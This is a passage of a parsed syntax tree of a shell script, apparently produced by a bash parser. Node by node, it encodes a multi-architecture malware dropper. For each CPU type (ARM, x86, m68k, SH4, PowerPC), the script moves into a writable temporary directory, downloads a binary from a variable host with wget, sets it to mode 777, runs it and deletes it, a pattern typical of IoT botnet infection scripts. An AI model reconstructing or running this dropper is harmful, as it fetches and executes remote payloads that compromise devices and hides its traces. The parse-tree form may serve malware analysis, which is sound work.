        CommandNode(lineno=39, pos=(3672, 3683), parts=[
          WordNode(lineno=39, pos=(3672, 3674), word='cd'),
          WordNode(lineno=39, pos=(3675, 3683), word='/dev/shm'),
        ]),
        OperatorNode(lineno=39, op='||', pos=(3684, 3686)),
        CommandNode(lineno=39, pos=(3687, 3694), parts=[
          WordNode(lineno=39, pos=(3687, 3689), word='cd'),
          WordNode(lineno=39, pos=(3690, 3694), word='/mnt'),
        ]),
        OperatorNode(lineno=39, op='||', pos=(3695, 3697)),
        CommandNode(lineno=39, pos=(3698, 3705), parts=[
          WordNode(lineno=39, pos=(3698, 3700), word='cd'),
          WordNode(lineno=39, pos=(3701, 3705), word='/var'),
        ]),
        OperatorNode(lineno=39, op=';', pos=(3705, 3706)),
        CommandNode(lineno=39, pos=(3707, 3725), parts=[
          WordNode(lineno=39, pos=(3707, 3711), word='wget'),
          WordNode(lineno=39, pos=(3712, 3725), word='$path/$armv6l', parts=[
            ParameterNode(lineno=39, pos=(3712, 3717), value='path'),
            ParameterNode(lineno=39, pos=(3718, 3725), value='armv6l'),
          ]),
        ]),
        OperatorNode(lineno=39, op=';', pos=(3725, 3726)),
        CommandNode(lineno=39, pos=(3727, 3744), parts=[
          WordNode(lineno=39, pos=(3727, 3732), word='chmod'),
          WordNode(lineno=39, pos=(3733, 3736), word='777'),
          WordNode(lineno=39, pos=(3737, 3744), word='$armv6l', parts=[
            ParameterNode(lineno=39, pos=(3737, 3744), value='armv6l'),
          ]),
        ]),
        OperatorNode(lineno=39, op=';', pos=(3744, 3745)),
        CommandNode(lineno=39, pos=(3746, 3755), parts=[
          WordNode(lineno=39, pos=(3746, 3755), word='./$armv6l', parts=[
            ParameterNode(lineno=39, pos=(3748, 3755), value='armv6l'),
          ]),
        ]),
        OperatorNode(lineno=39, op=';', pos=(3755, 3756)),
        CommandNode(lineno=39, pos=(3757, 3771), parts=[
          WordNode(lineno=39, pos=(3757, 3759), word='rm'),
          WordNode(lineno=39, pos=(3760, 3763), word='-rf'),
          WordNode(lineno=39, pos=(3764, 3771), word='$armv6l', parts=[
            ParameterNode(lineno=39, pos=(3764, 3771), value='armv6l'),
          ]),
        ]),
        OperatorNode(lineno=40, op='\n', pos=(3771, 3772)),
        CommandNode(lineno=40, pos=(3772, 3779), parts=[
          WordNode(lineno=40, pos=(3772, 3774), word='cd'),
          WordNode(lineno=40, pos=(3775, 3779), word='/tmp'),
        ]),
        OperatorNode(lineno=40, op='||', pos=(3780, 3782)),
        CommandNode(lineno=40, pos=(3783, 3794), parts=[
          WordNode(lineno=40, pos=(3783, 3785), word='cd'),
          WordNode(lineno=40, pos=(3786, 3794), word='/var/run'),
        ]),
        OperatorNode(lineno=40, op='||', pos=(3795, 3797)),
        CommandNode(lineno=40, pos=(3798, 3809), parts=[
          WordNode(lineno=40, pos=(3798, 3800), word='cd'),
          WordNode(lineno=40, pos=(3801, 3809), word='/dev/shm'),
        ]),
        OperatorNode(lineno=40, op='||', pos=(3810, 3812)),
        CommandNode(lineno=40, pos=(3813, 3820), parts=[
          WordNode(lineno=40, pos=(3813, 3815), word='cd'),
          WordNode(lineno=40, pos=(3816, 3820), word='/mnt'),
        ]),
        OperatorNode(lineno=40, op='||', pos=(3821, 3823)),
        CommandNode(lineno=40, pos=(3824, 3831), parts=[
          WordNode(lineno=40, pos=(3824, 3826), word='cd'),
          WordNode(lineno=40, pos=(3827, 3831), word='/var'),
        ]),
        OperatorNode(lineno=40, op=';', pos=(3831, 3832)),
        CommandNode(lineno=40, pos=(3833, 3851), parts=[
          WordNode(lineno=40, pos=(3833, 3837), word='wget'),
          WordNode(lineno=40, pos=(3838, 3851), word='$path/$armv7l', parts=[
            ParameterNode(lineno=40, pos=(3838, 3843), value='path'),
            ParameterNode(lineno=40, pos=(3844, 3851), value='armv7l'),
          ]),
        ]),
        OperatorNode(lineno=40, op=';', pos=(3851, 3852)),
        CommandNode(lineno=40, pos=(3853, 3870), parts=[
          WordNode(lineno=40, pos=(3853, 3858), word='chmod'),
          WordNode(lineno=40, pos=(3859, 3862), word='777'),
          WordNode(lineno=40, pos=(3863, 3870), word='$armv7l', parts=[
            ParameterNode(lineno=40, pos=(3863, 3870), value='armv7l'),
          ]),
        ]),
        OperatorNode(lineno=40, op=';', pos=(3870, 3871)),
        CommandNode(lineno=40, pos=(3872, 3881), parts=[
          WordNode(lineno=40, pos=(3872, 3881), word='./$armv7l', parts=[
            ParameterNode(lineno=40, pos=(3874, 3881), value='armv7l'),
          ]),
        ]),
        OperatorNode(lineno=40, op=';', pos=(3881, 3882)),
        CommandNode(lineno=40, pos=(3883, 3897), parts=[
          WordNode(lineno=40, pos=(3883, 3885), word='rm'),
          WordNode(lineno=40, pos=(3886, 3889), word='-rf'),
          WordNode(lineno=40, pos=(3890, 3897), word='$armv7l', parts=[
            ParameterNode(lineno=40, pos=(3890, 3897), value='armv7l'),
          ]),
        ]),
        OperatorNode(lineno=41, op='\n', pos=(3897, 3898)),
        CommandNode(lineno=41, pos=(3898, 3905), parts=[
          WordNode(lineno=41, pos=(3898, 3900), word='cd'),
          WordNode(lineno=41, pos=(3901, 3905), word='/tmp'),
        ]),
        OperatorNode(lineno=41, op='||', pos=(3906, 3908)),
        CommandNode(lineno=41, pos=(3909, 3920), parts=[
          WordNode(lineno=41, pos=(3909, 3911), word='cd'),
          WordNode(lineno=41, pos=(3912, 3920), word='/var/run'),
        ]),
        OperatorNode(lineno=41, op='||', pos=(3921, 3923)),
        CommandNode(lineno=41, pos=(3924, 3935), parts=[
          WordNode(lineno=41, pos=(3924, 3926), word='cd'),
          WordNode(lineno=41, pos=(3927, 3935), word='/dev/shm'),
        ]),
        OperatorNode(lineno=41, op='||', pos=(3936, 3938)),
        CommandNode(lineno=41, pos=(3939, 3946), parts=[
          WordNode(lineno=41, pos=(3939, 3941), word='cd'),
          WordNode(lineno=41, pos=(3942, 3946), word='/mnt'),
        ]),
        OperatorNode(lineno=41, op='||', pos=(3947, 3949)),
        CommandNode(lineno=41, pos=(3950, 3957), parts=[
          WordNode(lineno=41, pos=(3950, 3952), word='cd'),
          WordNode(lineno=41, pos=(3953, 3957), word='/var'),
        ]),
        OperatorNode(lineno=41, op=';', pos=(3957, 3958)),
        CommandNode(lineno=41, pos=(3959, 3975), parts=[
          WordNode(lineno=41, pos=(3959, 3963), word='wget'),
          WordNode(lineno=41, pos=(3964, 3975), word='$path/$i586', parts=[
            ParameterNode(lineno=41, pos=(3964, 3969), value='path'),
            ParameterNode(lineno=41, pos=(3970, 3975), value='i586'),
          ]),
        ]),
        OperatorNode(lineno=41, op=';', pos=(3975, 3976)),
        CommandNode(lineno=41, pos=(3977, 3992), parts=[
          WordNode(lineno=41, pos=(3977, 3982), word='chmod'),
          WordNode(lineno=41, pos=(3983, 3986), word='777'),
          WordNode(lineno=41, pos=(3987, 3992), word='$i586', parts=[
            ParameterNode(lineno=41, pos=(3987, 3992), value='i586'),
          ]),
        ]),
        OperatorNode(lineno=41, op=';', pos=(3992, 3993)),
        CommandNode(lineno=41, pos=(3994, 4001), parts=[
          WordNode(lineno=41, pos=(3994, 4001), word='./$i586', parts=[
            ParameterNode(lineno=41, pos=(3996, 4001), value='i586'),
          ]),
        ]),
        OperatorNode(lineno=41, op=';', pos=(4001, 4002)),
        CommandNode(lineno=41, pos=(4003, 4015), parts=[
          WordNode(lineno=41, pos=(4003, 4005), word='rm'),
          WordNode(lineno=41, pos=(4006, 4009), word='-rf'),
          WordNode(lineno=41, pos=(4010, 4015), word='$i586', parts=[
            ParameterNode(lineno=41, pos=(4010, 4015), value='i586'),
          ]),
        ]),
        OperatorNode(lineno=42, op='\n', pos=(4015, 4016)),
        CommandNode(lineno=42, pos=(4016, 4023), parts=[
          WordNode(lineno=42, pos=(4016, 4018), word='cd'),
          WordNode(lineno=42, pos=(4019, 4023), word='/tmp'),
        ]),
        OperatorNode(lineno=42, op='||', pos=(4024, 4026)),
        CommandNode(lineno=42, pos=(4027, 4038), parts=[
          WordNode(lineno=42, pos=(4027, 4029), word='cd'),
          WordNode(lineno=42, pos=(4030, 4038), word='/var/run'),
        ]),
        OperatorNode(lineno=42, op='||', pos=(4039, 4041)),
        CommandNode(lineno=42, pos=(4042, 4053), parts=[
          WordNode(lineno=42, pos=(4042, 4044), word='cd'),
          WordNode(lineno=42, pos=(4045, 4053), word='/dev/shm'),
        ]),
        OperatorNode(lineno=42, op='||', pos=(4054, 4056)),
        CommandNode(lineno=42, pos=(4057, 4064), parts=[
          WordNode(lineno=42, pos=(4057, 4059), word='cd'),
          WordNode(lineno=42, pos=(4060, 4064), word='/mnt'),
        ]),
        OperatorNode(lineno=42, op='||', pos=(4065, 4067)),
        CommandNode(lineno=42, pos=(4068, 4075), parts=[
          WordNode(lineno=42, pos=(4068, 4070), word='cd'),
          WordNode(lineno=42, pos=(4071, 4075), word='/var'),
        ]),
        OperatorNode(lineno=42, op=';', pos=(4075, 4076)),
        CommandNode(lineno=42, pos=(4077, 4093), parts=[
          WordNode(lineno=42, pos=(4077, 4081), word='wget'),
          WordNode(lineno=42, pos=(4082, 4093), word='$path/$i686', parts=[
            ParameterNode(lineno=42, pos=(4082, 4087), value='path'),
            ParameterNode(lineno=42, pos=(4088, 4093), value='i686'),
          ]),
        ]),
        OperatorNode(lineno=42, op=';', pos=(4093, 4094)),
        CommandNode(lineno=42, pos=(4095, 4110), parts=[
          WordNode(lineno=42, pos=(4095, 4100), word='chmod'),
          WordNode(lineno=42, pos=(4101, 4104), word='777'),
          WordNode(lineno=42, pos=(4105, 4110), word='$i686', parts=[
            ParameterNode(lineno=42, pos=(4105, 4110), value='i686'),
          ]),
        ]),
        OperatorNode(lineno=42, op=';', pos=(4110, 4111)),
        CommandNode(lineno=42, pos=(4112, 4119), parts=[
          WordNode(lineno=42, pos=(4112, 4119), word='./$i686', parts=[
            ParameterNode(lineno=42, pos=(4114, 4119), value='i686'),
          ]),
        ]),
        OperatorNode(lineno=42, op=';', pos=(4119, 4120)),
        CommandNode(lineno=42, pos=(4121, 4133), parts=[
          WordNode(lineno=42, pos=(4121, 4123), word='rm'),
          WordNode(lineno=42, pos=(4124, 4127), word='-rf'),
          WordNode(lineno=42, pos=(4128, 4133), word='$i686', parts=[
            ParameterNode(lineno=42, pos=(4128, 4133), value='i686'),
          ]),
        ]),
        OperatorNode(lineno=43, op='\n', pos=(4133, 4134)),
        CommandNode(lineno=43, pos=(4134, 4141), parts=[
          WordNode(lineno=43, pos=(4134, 4136), word='cd'),
          WordNode(lineno=43, pos=(4137, 4141), word='/tmp'),
        ]),
        OperatorNode(lineno=43, op='||', pos=(4142, 4144)),
        CommandNode(lineno=43, pos=(4145, 4156), parts=[
          WordNode(lineno=43, pos=(4145, 4147), word='cd'),
          WordNode(lineno=43, pos=(4148, 4156), word='/var/run'),
        ]),
        OperatorNode(lineno=43, op='||', pos=(4157, 4159)),
        CommandNode(lineno=43, pos=(4160, 4171), parts=[
          WordNode(lineno=43, pos=(4160, 4162), word='cd'),
          WordNode(lineno=43, pos=(4163, 4171), word='/dev/shm'),
        ]),
        OperatorNode(lineno=43, op='||', pos=(4172, 4174)),
        CommandNode(lineno=43, pos=(4175, 4182), parts=[
          WordNode(lineno=43, pos=(4175, 4177), word='cd'),
          WordNode(lineno=43, pos=(4178, 4182), word='/mnt'),
        ]),
        OperatorNode(lineno=43, op='||', pos=(4183, 4185)),
        CommandNode(lineno=43, pos=(4186, 4193), parts=[
          WordNode(lineno=43, pos=(4186, 4188), word='cd'),
          WordNode(lineno=43, pos=(4189, 4193), word='/var'),
        ]),
        OperatorNode(lineno=43, op=';', pos=(4193, 4194)),
        CommandNode(lineno=43, pos=(4195, 4211), parts=[
          WordNode(lineno=43, pos=(4195, 4199), word='wget'),
          WordNode(lineno=43, pos=(4200, 4211), word='$path/$m68k', parts=[
            ParameterNode(lineno=43, pos=(4200, 4205), value='path'),
            ParameterNode(lineno=43, pos=(4206, 4211), value='m68k'),
          ]),
        ]),
        OperatorNode(lineno=43, op=';', pos=(4211, 4212)),
        CommandNode(lineno=43, pos=(4213, 4228), parts=[
          WordNode(lineno=43, pos=(4213, 4218), word='chmod'),
          WordNode(lineno=43, pos=(4219, 4222), word='777'),
          WordNode(lineno=43, pos=(4223, 4228), word='$m68k', parts=[
            ParameterNode(lineno=43, pos=(4223, 4228), value='m68k'),
          ]),
        ]),
        OperatorNode(lineno=43, op=';', pos=(4228, 4229)),
        CommandNode(lineno=43, pos=(4230, 4237), parts=[
          WordNode(lineno=43, pos=(4230, 4237), word='./$m68k', parts=[
            ParameterNode(lineno=43, pos=(4232, 4237), value='m68k'),
          ]),
        ]),
        OperatorNode(lineno=43, op=';', pos=(4237, 4238)),
        CommandNode(lineno=43, pos=(4239, 4251), parts=[
          WordNode(lineno=43, pos=(4239, 4241), word='rm'),
          WordNode(lineno=43, pos=(4242, 4245), word='-rf'),
          WordNode(lineno=43, pos=(4246, 4251), word='$m68k', parts=[
            ParameterNode(lineno=43, pos=(4246, 4251), value='m68k'),
          ]),
        ]),
        OperatorNode(lineno=44, op='\n', pos=(4251, 4252)),
        CommandNode(lineno=44, pos=(4252, 4259), parts=[
          WordNode(lineno=44, pos=(4252, 4254), word='cd'),
          WordNode(lineno=44, pos=(4255, 4259), word='/tmp'),
        ]),
        OperatorNode(lineno=44, op='||', pos=(4260, 4262)),
        CommandNode(lineno=44, pos=(4263, 4274), parts=[
          WordNode(lineno=44, pos=(4263, 4265), word='cd'),
          WordNode(lineno=44, pos=(4266, 4274), word='/var/run'),
        ]),
        OperatorNode(lineno=44, op='||', pos=(4275, 4277)),
        CommandNode(lineno=44, pos=(4278, 4289), parts=[
          WordNode(lineno=44, pos=(4278, 4280), word='cd'),
          WordNode(lineno=44, pos=(4281, 4289), word='/dev/shm'),
        ]),
        OperatorNode(lineno=44, op='||', pos=(4290, 4292)),
        CommandNode(lineno=44, pos=(4293, 4300), parts=[
          WordNode(lineno=44, pos=(4293, 4295), word='cd'),
          WordNode(lineno=44, pos=(4296, 4300), word='/mnt'),
        ]),
        OperatorNode(lineno=44, op='||', pos=(4301, 4303)),
        CommandNode(lineno=44, pos=(4304, 4311), parts=[
          WordNode(lineno=44, pos=(4304, 4306), word='cd'),
          WordNode(lineno=44, pos=(4307, 4311), word='/var'),
        ]),
        OperatorNode(lineno=44, op=';', pos=(4311, 4312)),
        CommandNode(lineno=44, pos=(4313, 4328), parts=[
          WordNode(lineno=44, pos=(4313, 4317), word='wget'),
          WordNode(lineno=44, pos=(4318, 4328), word='$path/$sh4', parts=[
            ParameterNode(lineno=44, pos=(4318, 4323), value='path'),
            ParameterNode(lineno=44, pos=(4324, 4328), value='sh4'),
          ]),
        ]),
        OperatorNode(lineno=44, op=';', pos=(4328, 4329)),
        CommandNode(lineno=44, pos=(4330, 4344), parts=[
          WordNode(lineno=44, pos=(4330, 4335), word='chmod'),
          WordNode(lineno=44, pos=(4336, 4339), word='777'),
          WordNode(lineno=44, pos=(4340, 4344), word='$sh4', parts=[
            ParameterNode(lineno=44, pos=(4340, 4344), value='sh4'),
          ]),
        ]),
        OperatorNode(lineno=44, op=';', pos=(4344, 4345)),
        CommandNode(lineno=44, pos=(4346, 4352), parts=[
          WordNode(lineno=44, pos=(4346, 4352), word='./$sh4', parts=[
            ParameterNode(lineno=44, pos=(4348, 4352), value='sh4'),
          ]),
        ]),
        OperatorNode(lineno=44, op=';', pos=(4352, 4353)),
        CommandNode(lineno=44, pos=(4354, 4365), parts=[
          WordNode(lineno=44, pos=(4354, 4356), word='rm'),
          WordNode(lineno=44, pos=(4357, 4360), word='-rf'),
          WordNode(lineno=44, pos=(4361, 4365), word='$sh4', parts=[
            ParameterNode(lineno=44, pos=(4361, 4365), value='sh4'),
          ]),
        ]),
        OperatorNode(lineno=45, op='\n', pos=(4365, 4366)),
        CommandNode(lineno=45, pos=(4366, 4373), parts=[
          WordNode(lineno=45, pos=(4366, 4368), word='cd'),
          WordNode(lineno=45, pos=(4369, 4373), word='/tmp'),
        ]),
        OperatorNode(lineno=45, op='||', pos=(4374, 4376)),
        CommandNode(lineno=45, pos=(4377, 4388), parts=[
          WordNode(lineno=45, pos=(4377, 4379), word='cd'),
          WordNode(lineno=45, pos=(4380, 4388), word='/var/run'),
        ]),
        OperatorNode(lineno=45, op='||', pos=(4389, 4391)),
        CommandNode(lineno=45, pos=(4392, 4403), parts=[
          WordNode(lineno=45, pos=(4392, 4394), word='cd'),
          WordNode(lineno=45, pos=(4395, 4403), word='/dev/shm'),
        ]),
        OperatorNode(lineno=45, op='||', pos=(4404, 4406)),
        CommandNode(lineno=45, pos=(4407, 4414), parts=[
          WordNode(lineno=45, pos=(4407, 4409), word='cd'),
          WordNode(lineno=45, pos=(4410, 4414), word='/mnt'),
        ]),
        OperatorNode(lineno=45, op='||', pos=(4415, 4417)),
        CommandNode(lineno=45, pos=(4418, 4425), parts=[
          WordNode(lineno=45, pos=(4418, 4420), word='cd'),
          WordNode(lineno=45, pos=(4421, 4425), word='/var'),
        ]),
        OperatorNode(lineno=45, op=';', pos=(4425, 4426)),
        CommandNode(lineno=45, pos=(4427, 4446), parts=[
          WordNode(lineno=45, pos=(4427, 4431), word='wget'),
          WordNode(lineno=45, pos=(4432, 4446), word='$path/$powerpc', parts=[
            ParameterNode(lineno=45, pos=(4432, 4437), value='path'),
            ParameterNode(lineno=45, pos=(4438, 4446), value='powerpc'),
          ]),
        ]),
        OperatorNode(lineno=45, op=';', pos=(4446, 4447)),
        CommandNode(lineno=45, pos=(4448, 4466), parts=[
          WordNode(lineno=45, pos=(4448, 4453), word='chmod'),
          WordNode(lineno=45, pos=(4454, 4457), word='777'),
          WordNode(lineno=45, pos=(4458, 4466), word='$powerpc', parts=[
            ParameterNode(lineno=45, pos=(4458, 4466), value='powerpc'),
          ]),
        ]),
        OperatorNode(lineno=45, op=';', pos=(4466, 4467)),
        CommandNode(lineno=45, pos=(4468, 4478), parts=[
          WordNode(lineno=45, pos=(4468, 4478), word='./$powerpc', parts=[
            ParameterNode(lineno=45, pos=(4470, 4478), value='powerpc'),
          ]),
        ]),
        OperatorNode(lineno=45, op=';', pos=(4478, 4479)),
        CommandNode(lineno=45, pos=(4480, 4495), parts=[
          WordNode(lineno=45, pos=(4480, 4482), word='rm'),
          WordNode(lineno=45, pos=(4483, 4486), word='-rf'),
          WordNode(lineno=45, pos=(4487, 4495), word='$powerpc', parts=[
            ParameterNode(lineno=45, pos=(4487, 4495), value='powerpc'),
          ]),
        ]),
        OperatorNode(lineno=46, op='\n', pos=(4495, 4496)),
        CommandNode(lineno=46, pos=(4496, 4503), parts=[
          WordNode(lineno=46, pos=(4496, 4498), word='cd'),
          WordNode(lineno=46, pos=(4499, 4503), word='/tmp'),
        ]),
        OperatorNode(lineno=46, op='||', pos=(4504, 4506)),
        CommandNode(lineno=46, pos=(4507, 4518), parts=[
          WordNode(lineno=46, pos=(4507, 4509), word='cd'),
          WordNode(lineno=46, pos=(4510, 4518), word='/var/run'),
        ]),
        OperatorNode(lineno=46, op='||', pos=(4519, 4521)),
        CommandNode(lineno=46, pos=(4522, 4533), parts=[
          WordNode(lineno=46, pos=(4522, 4524), word='cd'),
          WordNode(lineno=46, pos=(4525, 4533), word='/dev/shm'),
        ]),
        OperatorNode(lineno=46, op='||', pos=(4534, 4536)),
        CommandNode(lineno=46, pos=(4537, 4544), parts=[
          WordNode(lineno=46, pos=(4537, 4539), word='cd'),
          WordNode(lineno=46, pos=(4540, 4544), word='/mnt'),
        ]),
        OperatorNode(lineno=46, op='||', pos=(4545, 4547)),
        CommandNode(lineno=46, pos=(4548, 4555), parts=[
          WordNode(lineno=46, pos=(4548, 4550), word='cd'),
          WordNode(lineno=46, pos=(4551, 4555), word='/var'),
        ]),
        OperatorNode(lineno=46, op=';', pos=(4555, 4556)),
        CommandNode(lineno=46, pos=(4557, 4581), parts=[
          WordNode(lineno=46, pos=(4557, 4561), word='wget'),
          WordNode(lineno=46, pos=(4562, 4581), word='$path/$powerpc440fp', parts=[
            ParameterNode(lineno=46, pos=(4562, 4567), value='path'),
            ParameterNode(lineno=46, pos=(4568, 4581), value='powerpc440fp'),
          ]),
        ]),
        OperatorNode(lineno=46, op=';', pos=(4581, 4582)),
        CommandNode(lineno=46, pos=(4583, 4606), parts=[
          WordNode(lineno=46, pos=(4583, 4588), word='chmod'),
          WordNode(lineno=46, pos=(4589, 4592), word='777'),
          WordNode(lineno=46, pos=(4593, 4606), word='$powerpc440fp', parts=[
            ParameterNode(lineno=46, pos=(4593, 4606), value='powerpc440fp'),
          ]),
        ]),
        OperatorNode(lineno=46, op=';', pos=(4606, 4607)),
        CommandNode(lineno=46, pos=(4608, 4623), parts=[
          WordNode(lineno=46, pos=(4608, 4623), word='./$powerpc440fp', parts=[
            ParameterNode(lineno=46, pos=(4610, 4623), value='powerpc440fp'),
          ]),
        ]),
        OperatorNode(lineno=46, op=';', pos=(4623, 4624)),
        CommandNode(lineno=46, pos=(4625, 4645), parts=[
          WordNode(lineno=46, pos=(4625, 4627), word='rm'),
          WordNode(lineno=46, pos=(4628, 4631), word='-rf'),
          WordNode(lineno=46, pos=(4632, 4645), word='$powerpc440fp', parts=[
            ParameterNode(lineno=46, pos=(4632, 4645), value='powerpc440fp'),
          ]),
        ]),
        OperatorNode(lineno=47, op='\n', pos=(4645, 4646)),
        CommandNode(lineno=47, pos=(4646, 4653), parts=[
          WordNode(lineno=47, pos=(4646, 4648), word='cd'),
          WordNode(lineno=47, pos=(4649, 4653), word='/tmp'),
        ]),
        OperatorNode(lineno=47, op='||', pos=(4654, 4656)),
        CommandNode(lineno=47, pos=(4657, 4668), parts=[
          WordNode(lineno=47, pos=(4657, 4659), word='cd'),
          WordNode(lineno=47, pos=(4660, 4668), word='/var/run'),
        ]),
        OperatorNode(lineno=47, op='||', pos=(4669, 4671)),
        CommandNode(lineno=47, pos=(4672, 4683), parts=[
          WordNode(lineno=47, pos=(4672, 4674), word='cd'),
          WordNode(lineno=47, pos=(4675, 4683), word='/dev/shm'),
        ]),
        OperatorNode(lineno=47, op='||', pos=(4684, 4686)),
        CommandNode(lineno=47, pos=(4687, 4694), parts=[
          WordNode(lineno=47, pos=(4687, 4689), word='cd'),
          WordNode(lineno=47, pos=(4690, 4694), word='/mnt'),
        ]),
        OperatorNode(lineno=47, op='||', pos=(4695, 4697)),
        CommandNode(lineno=47, pos=(4698, 4705), parts=[
          WordNode(lineno=47, pos=(4698, 4700), word='cd'),
          WordNode(lineno=47, pos=(4701, 4705), word='/var'),
        ]),
        OperatorNode(lineno=47, op=';', pos=(4705, 4706)),
        CommandNode(lineno=47, pos=(4707, 4725), parts=[
          WordNode(lineno=47, pos=(4707, 4711), word='wget'),
          WordNode(lineno=47, pos=(4712, 4725), word='$path/$x86_64', parts=[
            ParameterNode(lineno=47, pos=(4712, 4717), value='path'),
            ParameterNode(lineno=47, pos=(4718, 4725), value='x86_64'),
          ]),
        ]),
        OperatorNode(lineno=47, op=';', pos=(4725, 4726)),
        CommandNode(lineno=47, pos=(4727, 4744), parts=[
          WordNode(lineno=47, pos=(4727, 4732), word='chmod'),
          WordNode(lineno=47, pos=(4733, 4736), word='777'),
          WordNode(lineno=47, pos=(4737, 4744), word='$x86_64', parts=[
            ParameterNode(lineno=47, pos=(4737, 4744), value='x86_64'),
          ]),
        ]),
        OperatorNode(lineno=47, op=';', pos=(4744, 4745)),
        CommandNode(lineno=47, pos=(4746, 4755), parts=[
          WordNode(lineno=47, pos=(4746, 4755), word='./$x86_64', parts=[
            ParameterNode(lineno=47, pos=(4748, 4755), value='x86_64'),
          ]),
        ]),
        OperatorNode(lineno=47, op=';', pos=(4755, 4756)),
        CommandNode(lineno=47, pos=(4757, 4771), parts=[
          WordNode(lineno=47, pos=(4757, 4759), word='rm'),
          WordNode(lineno=47, pos=(4760, 4763), word='-rf'),
          WordNode(lineno=47, pos=(4764, 4771), word='$x86_64', parts=[
            ParameterNode(lineno=47, pos=(4764, 4771), value='x86_64'),
          ]),
        ]),
        OperatorNode(lineno=48, op='\n', pos=(4771, 4772)),
      ]),
    ReservedwordNode(lineno=48, pos=(4772, 4774), word='fi'),
  ]),
], pos=(264, 4774))
